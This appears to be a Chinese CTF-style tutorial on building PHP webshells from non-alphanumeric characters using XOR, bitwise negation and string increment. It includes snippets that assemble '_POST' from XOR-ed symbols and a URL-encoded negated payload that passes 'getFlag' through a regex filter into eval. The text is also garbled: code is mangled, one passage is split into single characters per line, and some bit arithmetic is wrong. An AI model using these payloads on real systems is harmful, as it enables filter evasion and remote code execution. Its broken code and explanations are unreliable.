什么是按位异或,异或本质是二进制运算
1001
0101
1100
对应二进制位相异(不相同)时,结果为1,否则为0
.
举例: 比如9^5,其实就是1001 ^0101 = 12,因此9^5=1100=12
对各个位置上进行异或处理
在php中,abc^def,会产生一个新的字符串,比较方式是:a的ascii码和d的ascii码进行二进制异或操作,生成新的二进制,然后转换为ascii,进而生成新的异或结果。所以,异或会产生新的字符串,上面表哥给的payload就是基于这样的方式生成出来的。
所以我们想,如果我们每一个都和ascli为256的进行对比的话,那么会获得相反的结果,每一个都对比两次,是不是就成为原来的结果了,和ascli为0进行比较,是不是就是原来的了
来,我们进行一次推理,去菜鸟教程进行一次实验
我们将A和进行了一次异或处理,而结果呢,就是出现了?为什么呢,因为A的ascil值是65(01000001),是2(100000000),他们的异或结果就是00111111也就是~,我们可以接着
假如我们因此构造webshell
<?php
var_dump(’#’^’|’); //得到字符 _
var_dump(’.’^’~’); //得到字符 P
var_dump(’/’^’'); //得到字符 0 var_dump('|'^'/'); //得到字符 S var_dump('{'^'/'); //得到字符 T $__=("#"^"|").("."^"~").("/"^"
").("|""/").("{""/"); //变
量$__值为字符串’_POST’ ?>
$++; 这行代码的意思是对变量名为""的变量进行自增操作,在PHP中未定义的变量默认值为null,nullfalse0,我们可以在不使用任何数字的情况下,通过对未定义变量的自增操作来得到一个数字。
我们同时也可以换一种形式,通过一起来比较来缩短字符的长度,当我们这些字符都被过滤了的话我们也可以通过~取反url编码语句来进行
我们先是弄这个
表
为
我
们
要
进
行
执
行
的
命
令
,
而
_表为我们要进行执行的命令,而
表为我们要进行执行的命令,而_++标成为另一个我们要进行执行的语句,
首先构造了POST,紧接着构造了POST的属于字符
接着构建$__=xxxx这个异或的数据模式,我们在懂得这个数据是怎么进行之后就进入了下面的操作,构造了目标语句
我们可以就直接
这种形式来进行,执行语句,也可以换一种方式
这样也行
如果在加上不能有&字符呢?
只要eval函数执行了“getFlag()”字符串即可,那么绕过正则匹配即可:
把getFlag取反然后URL编码:
?code=
=
_=~%98%9A%8B%B9%93%9E%98;
= ();
这里为什么正则没有检测到,因为后端自动进行了解码,解码为非字母和数字字符,而eval执行了取反还原为getFlag字符。
既然可以利用取反~进行编码绕过正则检测,那么也可以取反编码GET、_GET、GET、_POST。
还可以利用~取反
方法三
参考:
添加链接描述
原理:
利用php特性,在处理字符串变量的算术运算时,PHP沿袭了Perl的习惯,而非C的。如:a=′Z′;a=‘Z’;a=′Z′;a++;结果$a的值为’‘AA’,而在C中,变为’’{’,(‘Z’的ASCII值是90,而’{'的ASCII值为91)。注意字符变量只能递增,不能递减,并且只支持纯字母(a-z A-Z)。
那么如何拿到字符串’a’的变量呢?
数组(Array)的第一个字母就是大写A,而且第4个字母是小写a。也就是说,我们可以同时拿到小写和大写A,等于我们就可以拿到a-z和A-Z的所有字母。
在PHP中,如果强制连接数组和字符串的话,数组将被转换成字符串,其值为Array:再取这个字符串的第一个字母,就可以获得’A’了。